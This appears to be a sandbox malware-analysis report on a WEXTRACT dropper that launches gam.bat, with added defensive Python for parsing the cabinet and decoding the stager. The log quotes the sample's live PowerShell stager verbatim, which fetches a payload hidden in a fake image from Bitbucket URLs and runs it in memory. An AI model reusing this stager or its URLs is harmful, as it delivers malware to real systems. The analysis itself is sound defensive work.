Source: 0XVZC3kfwL.exe, 00000000.00000000.1455637940.00007FF681C2E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 0XVZC3kfwL.exe
Source: 0XVZC3kfwL.exe | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs 0XVZC3kfwL.exe
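The resource entry and the OriginalFilename strings above identify the dropper as a WEXTRACT.EXE (IExpress-style) self-extractor whose RT_RCDATA resource is a Microsoft cabinet: one folder, one CFDATA block, a single file gam.bat with the archive attribute ("+A"), setID 666, compression type 0x1503 (LZX with a 2^21 window) and the CFFILE table at offset 0x2c. Every one of those values lives in the fixed CFHEADER, CFFOLDER and CFFILE structures, so an analyst can list what such a dropper carries without decompressing anything. The parser below is an added example written for this page, not code from the sample or from Joe Sandbox: it scans a blob for the MSCF signature, walks the three structures and reports the contents. The cabinet it runs on is constructed here to match the report's description (the CFDATA payload is dummy bytes, not the real gam.bat).

```python
import struct
from typing import List, NamedTuple, Optional


class CabFile(NamedTuple):
    name: str
    size: int        # cbFile, uncompressed size
    folder: int      # iFolder index
    attribs: int     # 0x01 RDONLY, 0x02 HIDDEN, 0x04 SYSTEM, 0x20 ARCH ("+A"), 0x40 EXEC


class CabSummary(NamedTuple):
    set_id: int
    cabinet_index: int
    cabinet_size: int
    compress_types: List[int]   # one typeCompress per CFFOLDER
    data_blocks: int            # CFDATA blocks summed over all folders
    files: List[CabFile]


def find_cabinet(blob: bytes) -> Optional[int]:
    """Offset of the first CFHEADER signature in an arbitrary blob (a PE file, a
    dumped resource), or None. Enough to locate the cab inside a dropper."""
    off = blob.find(b"MSCF")
    return None if off < 0 else off


def parse_cabinet(blob: bytes, offset: int = 0) -> CabSummary:
    """Walk CFHEADER -> CFFOLDER[] -> CFFILE[] (MS-CAB layout) without decompressing."""
    (sig, _r1, cb_cabinet, _r2, coff_files, _r3, _ver_minor, _ver_major,
     c_folders, c_files, flags, set_id, i_cabinet) = struct.unpack_from("<4sIIIIIBBHHHHH", blob, offset)
    if sig != b"MSCF":
        raise ValueError("no CFHEADER at offset %d" % offset)
    pos = offset + 36
    folder_reserve = 0
    if flags & 0x0004:                          # cfhdrRESERVE_PRESENT: reserve sizes follow
        cb_hdr_res, cb_folder_res, _cb_data_res = struct.unpack_from("<HBB", blob, pos)
        pos += 4 + cb_hdr_res
        folder_reserve = cb_folder_res
    for bit in (0x0001, 0x0002):                # cfhdrPREV_CABINET / cfhdrNEXT_CABINET
        if flags & bit:                         # two NUL-terminated strings each
            for _ in range(2):
                pos = blob.index(b"\x00", pos) + 1
    compress_types, data_blocks = [], 0
    for _ in range(c_folders):
        _coff_start, c_cfdata, type_compress = struct.unpack_from("<IHH", blob, pos)
        compress_types.append(type_compress)
        data_blocks += c_cfdata
        pos += 8 + folder_reserve
    files: List[CabFile] = []
    pos = offset + coff_files                   # CFFILE table; 0x2c for a plain one-folder cab
    for _ in range(c_files):
        cb_file, _uoff, i_folder, _date, _time, attribs = struct.unpack_from("<IIHHHH", blob, pos)
        pos += 16
        end = blob.index(b"\x00", pos)
        files.append(CabFile(blob[pos:end].decode("latin-1"), cb_file, i_folder, attribs))
        pos = end + 1
    return CabSummary(set_id, i_cabinet, cb_cabinet, compress_types, data_blocks, files)


def describe_compression(type_compress: int) -> str:
    """typeCompress: low nibble = method, bits 8..12 = LZX window exponent."""
    method = {0: "none", 1: "MSZIP", 2: "Quantum", 3: "LZX"}.get(type_compress & 0x0F, "unknown")
    if method == "LZX":
        return "LZX (window 2^%d)" % ((type_compress >> 8) & 0x1F)
    return method


# Constructed stand-in for the dropped gam.bat; only its length matters here.
DUMMY_BAT = b"REM constructed placeholder, not the dropped gam.bat\r\n"


def build_sample_cab() -> bytes:
    """Constructed cabinet matching the report's description: one folder, one
    CFDATA block, one file gam.bat (+A), setID 666, typeCompress 0x1503."""
    cffile = struct.pack("<IIHHHH", len(DUMMY_BAT), 0, 0, 0x5932, 0x6000, 0x20) + b"gam.bat\x00"
    coff_files = 36 + 8                                   # CFHEADER + one CFFOLDER = 0x2c
    cfdata_off = coff_files + len(cffile)
    cfdata = struct.pack("<IHH", 0, len(DUMMY_BAT), len(DUMMY_BAT)) + DUMMY_BAT  # csum, cbData, cbUncomp
    total = cfdata_off + len(cfdata)
    cfheader = struct.pack("<4sIIIIIBBHHHHH", b"MSCF", 0, total, 0, coff_files, 0,
                           3, 1, 1, 1, 0, 666, 0)       # version 1.3, 1 folder, 1 file, flags 0
    cffolder = struct.pack("<IHH", cfdata_off, 1, 0x1503)
    return cfheader + cffolder + cffile + cfdata


# Constructed "dropper": MZ header junk, then the cab, then padding.
SAMPLE_DROPPER = b"MZ" + b"\x00" * 126 + build_sample_cab() + b"\x00" * 16


def list_dropper_contents(blob: bytes) -> List[str]:
    """One line per embedded file, in the form an analyst would paste into a triage note."""
    off = find_cabinet(blob)
    if off is None:
        return []
    cab = parse_cabinet(blob, off)
    return ["%s (%d bytes, folder %d, %s, attribs 0x%02x, setID %d)" % (
        f.name, f.size, f.folder, describe_compression(cab.compress_types[f.folder]),
        f.attribs, cab.set_id) for f in cab.files]


if __name__ == "__main__":
    for line in list_dropper_contents(SAMPLE_DROPPER):
        print(line)
```

Against the real sample, feed the raw bytes of 0XVZC3kfwL.exe (or the extracted RT_RCDATA resource) to list_dropper_contents; the file name, setID and compression type it prints should match the report's resource line, and the name is the thing to pivot on, since the dropper's next step is literally "cmd /c gam.bat".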
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 4423
Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.spre.evad.winEXE@9/6@1/1
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C26F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA | 0_2_00007FF681C26F14
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C21BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx | 0_2_00007FF681C21BF4
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C22EDC memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17 | 0_2_00007FF681C22EDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Process created: C:\Windows\System32\cmd.exe cmd /c gam.bat
Source: 0XVZC3kfwL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: 0XVZC3kfwL.exe | ReversingLabs: Detection: 42%
Source: unknown | Process created: C:\Users\user\Desktop\0XVZC3kfwL.exe "C:\Users\user\Desktop\0XVZC3kfwL.exe"
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Process created: C:\Windows\System32\cmd.exe cmd /c gam.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwB
l#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
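The two powershell.exe command lines in the process chain above show the whole staging scheme. The first layer keeps the real script in $codigo as base64 of UTF-16LE text in which every 'A' has been swapped for '#': once '#' is put back to 'A' and the result is base64- and UTF-16LE-decoded, the visible prefix reads exactly as the start of the child process's -command argument. The decoding step itself sits in the cut-off tail of the command line, which the page does not show; the substitution is inferred from that match. The second layer downloads a "jpg" from one of two Bitbucket URLs, keeps only the text between <<BASE64_START>> and <<BASE64_END>>, base64-decodes it, loads the bytes with [System.Reflection.Assembly]::Load and calls testpowershell.Home.la with a reversed string as its first argument, which reads as a further Bitbucket URL once reversed. The Python below is an added triage example written for this report, not code from the sample or from Joe Sandbox: it takes the report's own strings as input, and the carrier "image" and the payload inside it are constructed stand-ins, not the real download.

```python
import base64
import re
from typing import Optional

# First 216 characters of the $codigo value as quoted in the report's
# cmd.exe -> powershell.exe command line (the page cuts the rest off).
CODIGO_PREFIX = (
    "WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#"
    "UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#"
    "dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#"
)

# Constructed command line in the shape logged for the first powershell.exe
# (a Sysmon event 1 or Security 4688 record would carry the same text).
SAMPLE_CMDLINE = "powershell \"$codigo = '" + CODIGO_PREFIX + "';"


def extract_codigo(cmdline: str) -> Optional[str]:
    """Pull the quoted $codigo value out of a command line; tolerates a
    truncated line with no closing quote, as on the report page."""
    m = re.search(r"\$codigo\s*=\s*'([^']*)", cmdline)
    return m.group(1) if m else None


def decode_codigo(obfuscated: str, placeholder: str = "#") -> str:
    """Undo the first layer: the script was UTF-16LE encoded, base64 encoded, and
    every 'A' replaced by the placeholder. 'A' is the base64 digit for six zero
    bits, which makes it the most frequent digit in UTF-16LE text and a cheap
    one to hide from string matching."""
    restored = obfuscated.replace(placeholder, "A")
    restored = restored[: len(restored) - len(restored) % 4]   # drop a cut-off final group
    raw = base64.b64decode(restored)
    return raw.decode("utf-16-le", errors="replace")


START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def extract_stage2(carrier: bytes) -> Optional[bytes]:
    """Mirror the second layer's marker search on the downloaded 'image' and
    return the decoded blob, or None when the markers are missing or reversed."""
    start = carrier.find(START_FLAG)
    end = carrier.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    blob = carrier[start + len(START_FLAG):end]
    # .NET FromBase64String skips whitespace; b64decode(validate=False) discards
    # non-alphabet bytes as well, so a line-wrapped blob decodes the same way.
    return base64.b64decode(blob)


def looks_like_pe(blob: bytes) -> bool:
    """Assembly.Load needs a PE/.NET image, so this is the cheap check that the
    extracted blob is what the stager expects to get."""
    return blob[:2] == b"MZ"


def unreverse(arg: str) -> str:
    """The first argument handed to testpowershell.Home.la is stored reversed."""
    return arg[::-1]


# Constructed stand-in for new_image.jpg: JPEG-looking bytes with the markers
# wrapped around a base64 blob. The payload is a dummy, not a real assembly.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"constructed dummy, not an assembly"
FAKE_CARRIER = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x13\x37" * 16
                + START_FLAG + base64.b64encode(FAKE_PAYLOAD) + END_FLAG + b"\xff\xd9")


if __name__ == "__main__":
    print(decode_codigo(extract_codigo(SAMPLE_CMDLINE)))
    stage2 = extract_stage2(FAKE_CARRIER)
    print("stage 2 looks like a PE:", stage2 is not None and looks_like_pe(stage2))
    print(unreverse("txt.orFAmco/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth"))
```

On a live case, feed extract_codigo the full command line of the cmd.exe-spawned powershell.exe from process-creation logging, and feed extract_stage2 the bytes actually fetched from the two Bitbucket URLs; a blob that starts with MZ is the .NET assembly that Assembly.Load consumed, and the un-reversed first argument is the next URL worth blocking.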
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Section loaded: feclient.dll
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Section loaded: advpack.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 0XVZC3kfwL.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 0XVZC3kfwL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 0XVZC3kfwL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 0XVZC3kfwL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 0XVZC3kfwL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 0XVZC3kfwL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 0XVZC3kfwL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 0XVZC3kfwL.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: 0XVZC3kfwL.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: 0XVZC3kfwL.exe
        Source: Binary string: wextract.pdbGCTL source: 0XVZC3kfwL.exe
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1546060009.000001EEDDFAE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.1545872221.000001EEDDF60000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP@{ source: powershell.exe, 00000005.00000002.1545597457.000001EEDDF1A000.00000004.00000020.00020000.00000000.sdmp
